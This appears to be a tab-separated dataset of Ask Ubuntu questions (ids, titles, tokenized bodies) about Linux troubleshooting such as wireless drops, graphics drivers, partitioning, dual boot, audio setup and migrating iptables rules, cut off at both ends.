kb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:8926 errors:0 dropped:0 overruns:0 frame:0 tx packets:8926 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:737296 ( 737.2 kb ) tx bytes:737296 ( 737.2 kb ) wlan0 link encap : ethernet hwaddr 00:0f:66:6f:19:2c inet6 addr : fd63 : da35:957a:0:20f:66ff : fe6f:192c/64 scope : global inet6 addr : fe80 : :20f:66ff : fe6f:192c/64 scope : link inet6 addr : fd63 : da35:957a:0 : cc16 : dc3c : c7f5 : e400/64 scope : global up broadcast running multicast mtu:1500 metric:1 rx packets:4397 errors:0 dropped:0 overruns:0 frame:0 tx packets:3964 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2716198 ( 2.7 mb ) tx bytes:827754 ( 827.7 kb ) brandon @ linux-desktop : /etc/wpa_supplicant $ iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bg essid : '' bkhouse '' mode : managed frequency:2.462 ghz access point : 58:6d:8f:28:26:69 bit rate=48 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=63/70 signal level=-47 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:40 missed beacon:0 p.s . i 've tried all kinds of different configurations with wpa_supplicant but have n't been able to sort anything out !
253654	ubuntu using chinese language after power outage . how do i change it back ?	the title really says it all . it looks like i 'm using chinese/japanese/korean language or something after a power outage knocked me off . can anyone help me restore it back to english ? i 'm fairly new to all this , but still getting somewhat proficient , so please.. if possible , please supply the easiest way to go about it . but feel free to suggest more technical ways . the only contents in etc/default/locale is lang= '' en_us.utf-8 '' . literally , that 's the only thing in there .
253655	partitioning on gparted	i have tried over and over to partition my hard disk in a way so that every time i have to reinstall ubuntu , i wouldnt have to copy my data to an external device . i have followed all the possible steps on different websites but i havent yet made it to partition my hard disk in a 10gb space in which goes my ubuntu , and a completely separated 235 gb in which go all my other data without being lost the next time i format my pc ! could someone really help ! ! ! ?
253658	kubuntu 12.04 : nvidia-settings shows both of my screens as 'disabled '	when i start nvidia-settings , it says that both of my displays are disabled . except that i 'm typing this using display 0 . when i try to enable display 0 , it says separate x screen ( requires x restart ) i save the configuration to xorg.conf and restart the x server . then i 'm back to having two disabled displays . i 've run out of ideas . so does anyone have some words of wisdom to offer ? tia kubuntu 12.04 linux bender 3.2.0-37-generic # 58-ubuntu smp thu jan 24 15:28:10 utc 2013 x86_64 x86_64 x86_64 gnu/linux monitors : viewsonic vp201s ( dfp-0 on gpu-0 ) 1600x1200 mitsubishi meusptv8 ( dfp-1 on gpu-0 ) 1920x1080 video card : nvidia geforce 7900 gs packages : nvidia-173-updates : 173.14.36 nvidia-common : 1:0.2.44.2 nvidia-settings : 295.33 xserver info : version number : 11.0 vendor string : the x.org foundation vendor release number : 11103000 x.org version : 1.11.3
253659	deja-vu backup , test restored random volume ok , being home it was encrypted	as root backed up using deja-dup to a stick and it was successful . decided to test restoring one of the pgp volumes and it too was reported as successful . when i checked the test destination directory most of the file names started with ecryptfs_ and were useless to me . evidently the test must have been a part of /home which is encrypted . tried searching for solution and found ecryptfs-mount-private . ran it and the results were found mounted in desired /tmp/test directory but the files and filenames are still encrypted . what next ? does it have to be restored to /home/user or does it have to be backed up as the owner of the /home/user directory instead of root ? while investigating it seems like encryption of the home directory adds a whole degree of difficulty to a deja-dup restore of such . thanks for any help .
253661	no list of wireless connections in menu	i have no list of wireless connections from the drop down menu when trying to establish the connection . i am using a brand new download of 12.10 . i have a dell inspirion 1420 . i ran the troubleshoot in unbuntu but i have no drivers listed in the last step . please help someone ... . edit : broadcom internal wireless card is recognized through the terminal steps listed in the trouble shooting document in unbuntu
253664	what is jack audio ? i have problems with hydrogen+jack	i want to do a lot of music editing , recording , etc . first of all i installed hydrogen and along with it came this 'jack ' . after i use hydrogen , my system sounds stop working and start again only after restarting . i tried googling this problem and seems like several others have this problem too . the solutions there are actually some explanations and i do n't have the patience to read all those pages ! what i want regarding jack audio is : a simple and proper understanding of what this software does so that solutions to this problem make sense . when we go to their actual website , they have all this long story of `` do you want to ... . blah blah '' . when we go to the wikipedia article , they straight away demoralize us with all technical terms . how i can close it along with hydrogen so that my system sounds return to normal ( or ) how i can make all my system functions works along with jack . in this case , jack will have to start with every boot . hydrogen 's default midi driver is alsa ( even when there is a jackmidi option ) ; then why is jack needed at all ?
253669	why is ubuntu 12.10 freezing and windows becoming greyed out ?	i 've been using ubuntu 12.04 since it was released last april . ( i upgraded to 12.10 in october . ) suddenly it began running very very poorly , acting as if i was using too much ram or saturating my cpu . the system monitor and top did not seem to confirm this ; i was only using about 30 % of my ram and barely any cpu . windows began greying out randomly and frequently and the system completely froze a few times . i figured this was some junk i 'd been tinkering with over the year , so i backed up my data and formatted , then re-installed . after booting back up , i saw that the problems persisted . system info : white box pc intel core2 duo e8400 4gb ddr2 800mhz nvidia geforce 8800 gts ubuntu 12.10 64bit let me know if you need any further information . any and all help is appreciated .
253674	why am i getting graphical error while booting ?	i have successfully installed ubuntu and it runs perfectly . but , why is there only a pink and purple screen while it boots ? my machine specs are 2nd gen i3 2.4ghz , 8gb ram , intel hd graphics and amd radeon hd switchable .
253675	why is this sound device recognized but no software can record with it ?	i recently bought an alesis io4 , a 4 microphone usb input device , which , according to this site works under linux `` completely '' , and was tested using ubuntu 9.04 . so i thought it was a good bet it would work with my 12.10 ubuntu laptop . when i connect it by usb to my laptop , it is recognized under the sound settings , and if i speak into the microphones i can see a response : so far so good . however , in audacity , when i press `` record '' , i see no response whatsoever . my main concern is audacity , but i tried also using ubuntu 's `` sound recorder '' utility , and it also showed no response in its level meter when i spoke into the mike , so i think this is n't just an audacity problem . i looked into audacity 's preferences , and under host in the interface section , the only option is alsa . under device in the recording section , there are four options . hda : intel is my on-board sound card . i 'm not sure what the difference between pulse , default , and sysdefault is , but in any case , selecting any of them does not seem to change anything . why is my sound device seen by the os but not by audacity ( or any other software ) ? how do i set it up so that audacity takes input from this device ? update : according to a very helpful person on the audacity forums , the problem i 'm reporting here is most likely caused by a bug in alsa . the current version of alsa in the ubuntu repositories does not seem to contain the necessary patch , so i 'm hoping it will be updated soon .
253677	why does 32 bit and 64 bit ubuntu os change the behavior of the r8169 lan module ?	this question is posed because i finished building a new rig with a ga-990fxa-ud3 mobo , unlocked fx 4100 proc , 16gb ram , and gt 640 graphix card . started it up and tested the mobo ( via bios ) and all was beautiful with it and all its many ports . then i grabbed a copy of ubuntu 12.04 64bit and fired up the live disc . besides not recognizing my two monitors off the rip , things seemed okay except i was getting a wired connection disconnected pop up in the top right hand corner . then i noticed that several peripherals ( usb ) were not lit up . tested all the usb ports ; only two were live . tested my lan cat5 cable to my router with another computer ; it was live . shut down the rig and fired it up a couple more times with the same results . then i grabbed another disc , xubuntu 64bit ; same thing . grabbed an ultimate edition 3.5 64bit ; same thing . hours later i thought that it was related to the realtek r8169 module . then by some chance i grabbed an older ubuntu version ; 10.04 lts . however , i did not realize that it was 32bit . everything worked ; usb , lan , etc . so i installed 10.04 ubuntu ( again did not realize that it was 32bit ) and everything worked great . decided on a whim to upgrade through ubuntu to 12.04 . everything worked great . puzzled , i continued to update and add my normal apps . tried to install chrome and the package installer gave me a wrong architecture error . it was only then that i realized i had 32bit installed . immediately , i grabbed the 12.04 64bit live dvd and rebooted . same problems . there is no doubt that the hardware that i have supports 64bit so that is not the issue . why the 64bit kernel and the 32bit kernel act so differently in ( seemingly ) compatible hardware is beyond me . does anybody have some explanation about this strange phenom ? i am okay with 32bit but i would really prefer to have 64bit if it is possible .
253679	network monitor widget	is there a widget that shows all current hosts ( ip adresses ) in a list ? i am not talking about a network bandwidth meter widget .
253691	can i use an optimus card without switching ?	i know about bumblebee and stuff . but my notebook is like a desktop now , it is always powered by energy , without battery at all . my goal is to use the nvidia card all the time , without the switching hiccups . it 's possible on ubuntu 12.10 ? i have a geforce 540m card with intel 3000 as the integrated graphics card . no luck with disabling optimus on the bios . even if i want to use nvidia all the time , i still need bumblebee ? i tried to install via apt the nvidia-current package but when i restart i got no unity : ( purged this driver and tried to install the direct downloaded from nvidia site , rebooting into recovery and installing without x server and lightdm . no luck too . please advise !
253694	how to fully erase windows 8 and install ubuntu ?	i 'm looking to buy a new laptop or desktop this year and was wondering if i should buy a computer with windows 8 ? i see that every ubuntu user that has bought a windows 8 laptop that they are having the worst time getting windows 8 removed from the hard drive . i do n't want windows at all on my computer i ca n't stand that greedy corporation , i just want a new computer that is easy to install ubuntu and totally erase windows . can someone help me please ? ? ? ? ?
253700	wireless intermittently failing on 12.04 and 12.10	i seem to have a failing wireless card that happens after a few hours . this card is new and works fine in a windows 7 pc ( i installed it to make sure it works ) . my machine is as follows : sudo lshw -c network *-network description : wireless interface product : rtl8191sevb wireless lan controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 10 serial : 00:08:54 : a2:73:86 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8192se driverversion=3.5.0-23-generic firmware=n/a ip=10.0.1.63 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 ioport : e000 ( size=256 ) memory : fe500000-fe503fff uname -a linux core 3.5.0-23-generic # 35-ubuntu smp thu jan 24 13:15:40 utc 2013 x86_64 x86_64 x86_64 gnu/linux sudo lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:19.0 ethernet controller : intel corporation 82579v gigabit network connection ( rev 05 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation h67 express chipset family lpc controller ( rev 05 ) 00:1f.2 raid bus controller : intel corporation 82801 sata controller [ raid mode ] ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 pci bridge : integrated technology express , inc. device 8892 ( rev 30 ) 03:00.0 network controller : realtek semiconductor co. , ltd. rtl8191sevb wireless lan controller ( rev 10 ) 04:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 03 ) /sbin/ifconfig wlan0 wlan0 link encap : ethernet hwaddr 00:08:54 : a2:73:86 inet addr:10.0.1.63 bcast:10.0.1.255 mask:255.255.255.0 inet6 addr : fe80 : :208:54ff : fea2:7386/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2021 errors:0 dropped:0 overruns:0 frame:0 tx packets:1762 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2060458 ( 2.0 mb ) tx bytes:295268 ( 295.2 kb ) when the issues happens i see no errors in /var/log/syslog , except that when i attempt to reconnect to the wifi ap , it just keeps deauthing / never correctly authing . even if i remove the saved ap and re-enter it , it fails . i also tried restarting the network-manager , that does n't help . i also make sure the card is n't entering power-save mode , that 's turned : off . if i reboot the machine , the wifi will work for a few more hour ( s ) , and then fail . any help - this is a deal breaker for me currently . = [ update : when this happens , wlan0 still reports and ip , though i can not ping anything on my network , nor my gateway x.x.x.1 . the card in question is : http : //www.newegg.com/product/product.aspx ? item=n82e16833166063
253701	need advice for linking with shared library	i am working with awesomium sdk for linux 32 bit system , i have followed these instructions to manually install awesomium on any linux distro , you 'll need to add the shared library to your system 's library search path . on ubuntu , you can use the following commands : cd awesomium_v1.6.5_sdk_linux32 sudo mkdir /usr/lib/awesomium-1.6.5 sudo cp -r build/bin/release/* /usr/lib/awesomium-1.6.5 if the folder /etc/ld.so.conf.d does not exist : sudo mkdir /etc/ld.so.conf.d and finally : sudo cp config/awesomium-1.6.5.conf /etc/ld.so.conf.d sudo ldconfig till here i followed all steps.then there is a step that i am not able to understand , so i have not done this below step : to link against awesomium , you should use `` -lawesomium-1.6.5 '' , for example : g++ main.cpp -lawesomium-1.6.5 -o myapp and finally i followed this final step , to work with the awesomium.mono samples , copy the awesomium.net folder to a writeable location and open : samples/mono/awesomium.mono samples.sln in monodevelop . i copied the folder in desktop and opened it from there . now after following these steps when i run my project it gives me exception that system.dllnotfoundexception libawesomium-1.6.5.so.0 i need help to solve this exception , when i manually check it this .so lib is available in /usr/lib/awesomium-1.6.5 , but somehow its giving me this bug . so please help me out on this . as far as softwares are concerned i have installed monodevelop , xsp4 server , libx11-dev . regards rohit
253703	how do i install ubuntu 12.04 on an asus g74sx- bbk7 ?	i have a problem when i try to install ubuntu on my laptop . when i choose the option `` install '' , the screen is black and i ca n't continue the install . i read some to edit with command line , how write the command pci=nomsi and acpi=off but did n't a result . can you help me ?
253704	ubuntu 12.04 impacting wireless speed of other devices	i am having hp-pavilion g7-1310 us laptop and am using ubuntu 12.04 in it . i also have wireless router at my home using which i connect my laptop for internet . i also use that router to connect to other devices . from last few days , i am facing a weird problem.if i connect my laptop with wireless router , my other devices get speed from 30 mbps to almost 2 mbps . i tested this weird problem by connecting using wired connection and if i connect laptop using wired connection , my other devices get proper speed ( almost 30 mbps ) . i have no idea why this is happening . please help me out . thanks . j.m .
253705	graphical user interface to view man page ?	are there any tools to view man pages in a gui ? i personally dislike the command line interface . it lacks easy scrolling , searching and so on . is there any tool with some more intuitive user interface and features ? preferably for kde .
253708	how to copy the contents of many folders to one ?	i have several music files all in individual folders by artist name that i want to copy to one location so rhythmbox can import all the files from the single location . i 've seen simple program solutions to this but none for ubuntu . any suggestions ?
253710	bootloader issue	i had a system with dual booting of windows and ubuntu . windows was installed first and ubuntu second . now windows is all virus- virus and i want to format it . but once i format and reinstall windows the bootloader wo n't show any options to boot into ubuntu . the bootloader will be of windows by default . how can i format windows but keep the bootloader of ubuntu ?
253714	system is responding too slow after installing nvidia drivers in ubuntu12.10	my monitor was flickering after booting ubuntu 12.10 . the problem was increasing if i start moving my mouse and when it is kept idle , the flickering used to stop . my system has an amd 32 bit processor with a nvidia graphics card . in windows the monitor does n't have any problem . in-order to resolve this problem , i had installed nvidia drivers by following the below steps . sudo apt-get install linux-source sudo apt-get install linux-headers-generic sudo apt-get install nvidia-current now the flickering issue is not there . but my system is too slow after logging into ubuntu . it takes at least one minute even for opening a window . please let me know how to solve this .
253721	how to get snes smartjoy working on 12.04 ?	i have an snes smartjoy adapter so i can use a snes controller with emulators but i ca n't get it working under ubuntu . is there a controller configuration utility i need to use ? i 'm trying to get it working using the visualboy advance emulator from the standard ubuntu repository but i 'm not having any luck getting a response from that program 's controller setup menu .
253722	setting focus on mouse as default	i have looked at the other questions about gaining focus on mouse but when i reboot my computer it reverts back to gaining focus on click . i have tried the method given here : how do i set focus follows mouse ? . i 've also tried through ubuntu tweak and tweak tool . all three methods work until i reboot my computer . thanks !
253728	how to safely download and gpg verify a debian source package ?	i need specific ( source or binary ) packages from debian . can i download the package using apt-get ? how can i add the debian repository to my sources.list so it only gets used on a by case base ? without messing up my system by using the whole debian repository ? how can i get the gpg key for the debian repository to be sure the package was signed by the debian archive ? ( please do n't tell me , that the system may break . i am aware of that and could n't care less , because i can easily restore a vm snapshot . )
253729	ca n't get firefox to load please help !	got a problem with firefox , i installed enlightenment ( e17 ) and i added a .png to the icon on the desktop to change the way the icon looks . now my problem is i uninstalled e17 and now i 'm just using ubuntu desktop but ubuntu keeps looking for that old path to the icon i super imposed onto firefox in e17 , i tried uninstalling firefox and reinstalled it , but firefox will not boot the only way it boots is when i 'm in terminal and type firefox . i do n't understand how i can get firefox to work again ? fyi i removed ffox in ubuntu software centre and also through synaptic and reinstalled through both , but it 's still looking for that path to the icon which does not exist . please help . : ) ps i know i screwed it up trying to make the shortcut icon to firefox to look different , but is there a way to make ubuntu forget the icon path ?
253732	proprietary drivers : does ubuntu know truly what my system has ?	i was just wondering if ubuntu actually knows the proprietary drivers of my laptop . using a dell inspiron 15r 6gb ram i5 intel core processor . if i pick the drivers that it recommends are they actually the right ones ? it 's not a serious problem but just was wondering if ubuntu actually knows this or it just gives you a whatever driver for intel , and also is this driver actually designed for this chipset ? all answers welcome , well only nice ones . : )
253733	error : mysql database does n't support transactions	i have a innodb has a default database which supports transactions . but , when i run transactions script for mysql sql-benchmarking i get below error : show engines : + -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- + -- -- -- -- -- -- + | engine | support | comment | transactions | xa | savepoints | + -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- + -- -- -- + -- -- -- -- -- -- + | performance_schema | yes | performance schema | no | no | no | | mrg_myisam | yes | collection of identical myisam tables | no | no | no | | memory | yes | hash based , stored in memory , useful for temporary tables | no | no | no | | blackhole | yes | /dev/null storage engine ( anything you write to it disappears ) | no | no | no | | myisam | yes | myisam storage engine | no | no | no | | csv | yes | csv storage engine | no | no | no | | archive | yes | archive storage engine | no | no | no | | federated | no | federated mysql storage engine | null | null | null | | innodb | default | supports transactions , row-level locking , and foreign keys | yes | yes | yes | + -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -+ -- -- -- -- -- -- -- + -- -- -- + -- -- -- -- -- -- + i have edited my.cnf adding default-engine innodb . but still no luck .
253738	where does software go after it is downloaded ?	i tried downloading clamav and it could not be found . also i 'm clueless on how to install stuff using the terminal . i 'm sick of windows and want to learn how this works .
253747	wifi connection lost from time to time on a dell inspiron 1520	i have an ubuntu 12.10 installed on a dell inspiron 1520 . i got my wifi working but the connection to the router drops from time to time . i could n't figure out yet what 's causing the drop . the connection does n't recover automatically . instead , if i disable the wifi and enable it back , it reconnects immediately . with the other computers in the house i do n't have this problem , so it assume it 's something related to the os or the drivers . does anybody have an idea what could be wrong ? i can provide log files or configurations , if needed . thank you .
253751	is there a way to stop kde from overwriting my other wm settings ?	what is the problem ? kde does not respect other window manager/de settings . is there a way to safely run kde alongside other window managers without having to reconfigure them every time after finishing my testing with kde ? background my user 's main desktops are primarily xfce ( 4.6 , 4.8 , 4.10 ) and unity . i frequently test multiple window managers ( fluxbox , enlightenment , unity , gnome , etc ) . only kde causes me problems when returning to another wm once i am done testing some kde functionality . what i have done to fix this ? when returning to a wm other than kde , i find that i have to delete config ( specifically *gtk files ) files in order to return my other wm 's to their default settings . what answer am i looking for ? are there any file permissions that i can set to prevent kde from breaking my other wm settings ? is there a way to determine what files in my home directory that kde touches and modifies ? that might help my narrow down my issue . i am amenable to building a login script to correct anything that kde has broken . for three users , this would be acceptable . this does n't scale to 50 users . what can i do to safely test kde and return to my default window manager without having to continually restore my configuration ? why is this important ? here is a use-case that is causing me problems : i have a user ( think c-level exec ) that likes to change back and forth between kde and xfce ( among other wms ) . how can i configure their profile so they do not get kde window decorations when they decide to move back to xfce ? as it stands , i have been unable to prevent an xfce session from being totally mangled after a user logged into a kde session .
253754	offline files view - iphone app for ubuntu one files	i downloaded the iphone mobile app `` ubuntu one files '' . i downloaded the files for offline view , but once i disconnect wifi/3g network , the app does not show any files for offline view . is this the expected behaviour ? is this an issue ? how can i enable offline view of files in my iphone app ? any suggestion is highly appreciated regards , mari
253756	uninstall program by terminal	how can i uninstall any program using terminal . for example , how can i uninstall teamviewer 7 wich is stored in my home folder . i can not see teamviewer in ubuntu softvare center , so i can not uninstall it that way .
253760	assign more than 1 cpu/core to a process	i lost the password to open a pdf file i need to access , so i installed pdfcrack with the hope to recover my password . actually it 's one month that pdfcrack is running but i still am waiting for the result . looking at system monitor i noted that pdfcrack is using just one core of my cpu , the other 7 are idle . is there a way to assign to pdfcrack more than one core to use ? i 'm using ubuntu 12.04lts 32-bit .
253765	iwconfig indicates `` no wireless extensions '' for a working wifi card	i was trying to set-up a virtual wifi access point . to find my interface name i used iwconfig and it showed no wireless extensions even though i am able use my wifi card . using : dell 1540 vostro driver : broadcom sta wireless driver ( its an additional driver ) iwconfig result : lo no wireless extensions . eth1 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : off eth0 no wireless extensions . lspci result : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 05 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 12:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 13:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 06 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 02 )
253767	ubuntu 12.04 windows 8 uefi dual boot	a friend has a new laptop with windows 8 pre-installed and he 'd like to install ubuntu like a second operating system . i recommend him to use the ubuntu 12.04 lts because he is a new ubuntu user and lts distributions in my opinion are more stables than the normal distributions . well , my question is if it 's possible to install dual boot windows 8 with uefi and ubuntu 12.04 . someone can explain the steeps to do ? thank you in advanced .
253770	why ca n't i use a partition ?	i converted one of my ntfs partitions to ext4 format with the gparted tool . now , i can not copy , or create , any files on that partition .
253771	high cpu temperature and fan speed in ubuntu 12.04	i am using 12.04 lts version of ubuntu . in which i am getting high cpu temperature and fan speed from beginning of the system . temperature remain > 62째c . i am using jupitar but it 's not helping in case of mine . jupitar in power saving mode . and very low battery backup . help me with this problem . i am using hp pavilion dv6 - 6120tx processor intel core i5-2410m gpu model amd radeon hd 6490m
253774	how exactly does synaptic keep track of `` new in repository '' packages ?	is this info part of apt cache or does it create a separate file to compare with new cache ? where is it stored then ?
253775	is it possible to assign/change custom icons for files in a batch / from commandline ?	actually , i 'm talking about icons for nautilus scripts , and i have many of them . although i prefer menus without icons , i can not prevent icons from being displayed in nautilus context menu items open with and scripts . particularly , having the same script icon displayed for all of them does not look good at all . so , if i can not prevent them , at least i 'd like them use icons better related with the function of each script . it 's easy to assign a custom icon for a single file through file properties but i have a total of 82 nautilus scripts at the moment ! when you enter gvfs-info /path/to/file command in terminal , you can see a line like this : metadata : :custom-icon : file : ///usr/share/icons/nitrux-buttons/apps/scalable/accessories-text-editor.svg i wonder if it is possible at all to edit this line ( where ever it is ) in a batch / from command line ?
253781	music lens does not show my music	i have 10gbs of mp3 , aac and flac files on my hard disk . most of them were legally purchased online or ripped from cds . some of them are n't . the music lens does not show any of my music when i search . when i installed 12.10 i immediately removed rhythmbox and installed audacious . is this the reason why this is happening ? or does it work only for music from the ubuntu music store ?
253783	is it possible to have nautilus scripts menu items without icons ?	i have opted for menus without icons system-wide for reasons of simplicity and speed . but i still get icons in nautilus context menus . i do n't mind the icons on open with menu items too much , but all those identical icons on nautilus scripts ( especially when you have many scripts ) look ugly . i wonder if there 's a way of disabling these icons at all ?
253785	can not overwrite file /home/baadshah/.config/qtproject/qtcreator/toolchains.xml : permission denied	can not overwrite file /home/baadshah/.config/qtproject/qtcreator/qtversion.xml : permission denied can not overwrite file /home/baadshah/.config/qtproject/qtcreator/toolchains.xml : permission denied can not overwrite file /home/baadshah/.config/qtproject/qtcreator/devices.xml : permission denied can not overwrite file /home/baadshah/.config/qtproject/qtcreator/toolchains.xml : permission denied i am getting these 4 errors when opening qt and uinable to find application when opening a new files
253788	what happens to your files on windows after installing ubuntu	first of all i would like to say that i am new to ubuntu and i could n't find anything about this on the web . i 'm planning on installing ubuntu 12.10 on my pc ( i want to erase windows of my pc ) but i was wondering if i will be able to keep my files after installing ubuntu or will everything be erased by installing the ubuntu os . of course i will be backing-up all my files in dropbox . but is there a way that i wont need to do that .
253789	how do i upgrade android on my phone with ubuntu ?	i have a galaxy europa running android v2.2 . i want to upgrade it to gingerbread v2.3 . in windows i would use samsung kies for this task . how do i do it in ubuntu ?
253793	howto get the number of available updates/security-updates in ubuntu server	i 'm writing a small daemon in c/c++ and i need to get the number of updates available and how many of them are security updates . so far i know i could use either update-notifier or nagios but just for getting the number of updates these have way to many dependencies that i do n't need/want on an headless server . is there any way to get this information directly through apt or are there even libs for c/c++ with this functionality ? i have byobu running on my server and it somehow retrieves this information and displays it but i do n't know how .
253797	migrate debian firewall rule to ubuntu	my old debian firewall died and i 'm migrating saved rules to ubuntu this way : iptables-restore < firewall_config i get this error : bad argument `192.168.1.0/255.255.255.0' error occurred at line : 18 opening the file here 's line 18 : -a postrouting -s ! 192.168.1.0/255.255.255.0 -j masquerade what is wrong ? edit : for a more complete question here 's the firewall rule backup made with iptables-save on debian : # generated by iptables-save v1.3.6 on tue sep 14 11:21:30 2010 *mangle : prerouting accept [ 11666894:3426002549 ] : input accept [ 3992541:2783596820 ] : forward accept [ 7601705:635682622 ] : output accept [ 3786217:2807778972 ] : postrouting accept [ 4294041:3102897533 ] commit # completed on tue sep 14 11:21:30 2010 # generated by iptables-save v1.3.6 on tue sep 14 11:21:30 2010 *nat : prerouting accept [ 7593900:393423684 ] : postrouting accept [ 27503:1709683 ] : output accept [ 92965:5762818 ] -a prerouting -p tcp -m tcp -- dport 23 -j dnat -- to-destination 172.0.0.1:23 -a prerouting -s x.y.0.0/255.255.0.0 -p tcp -m tcp -- dport 222 -j dnat -- to-destination 172.0.0.2:22 -a postrouting -s 172.0.0.2 -j accept -a postrouting -s ! 192.168.1.0/255.255.255.0 -j masquerade commit # completed on tue sep 14 11:21:30 2010 # generated by iptables-save v1.3.6 on tue sep 14 11:21:30 2010 *filter : input drop [ 5448:597666 ] : forward drop [ 175410:8444546 ] : output accept [ 3785918:2807753497 ] -a input -p icmp -j accept -a input -p tcp -m tcp -- dport 22 -j accept -a input -i lo -j accept -a input -d 172.0.0.121 -j accept -a input -s 172.0.0.121 -j accept -a input -p tcp -m tcp -- sport 22 -j accept -a input -p tcp -m tcp -- sport 53 -j accept -a input -p udp -m udp -- sport 53 -j accept -a input -p tcp -m tcp -- sport 80 -j accept -a input -p tcp -m tcp -- dport 80 -j accept -a input -p tcp -m tcp -- dport 443 -j accept -a input -p tcp -m tcp -- sport 443 -j accept -a input -p tcp -m tcp -- sport 4445 -j accept -a input -p tcp -m tcp -- sport 21 -j accept -a input -p tcp -m tcp -- sport 20 -j accept -a input -p tcp -m tcp -- sport 8085 -j accept -a input -p tcp -m tcp -- sport 23 -j accept -a input -p tcp -m tcp -- dport 10000 -j accept -a input -p tcp -m tcp -- dport 8988 -j accept -a input -p tcp -m tcp -- dport 25 -j accept -a input -p tcp -m tcp -- sport 25 -j accept -a forward -p icmp -j accept -a forward -d 172.0.0.121 -j accept -a forward -m state -- state related , established -j accept -a forward -p tcp -m tcp -- dport 110 -j accept -a forward -p tcp -m tcp -- dport 143 -j accept -a forward -p tcp -m tcp -- dport 20 -j accept -a forward -p tcp -m tcp -- dport 21 -j accept -a forward -p tcp -m tcp -- dport 25 -j accept -a forward -p tcp -m tcp -- dport 53 -j accept -a forward -p udp -m udp -- dport 53 -j accept -a forward -s 172.0.0.123 -p tcp -m tcp -- dport 8999 -j accept -a forward -s 172.0.0.123 -p tcp -m tcp -- dport 12177 -j accept -a forward -p tcp -m tcp -- dport 8085 -j accept -a forward -p tcp -m tcp -- dport 23 -j accept -a forward -s 172.0.0.187 -j accept -a forward -p tcp -m tcp -- dport 5573 -j accept -a forward -p tcp -m tcp -- dport 5574 -j accept -a forward -p tcp -m 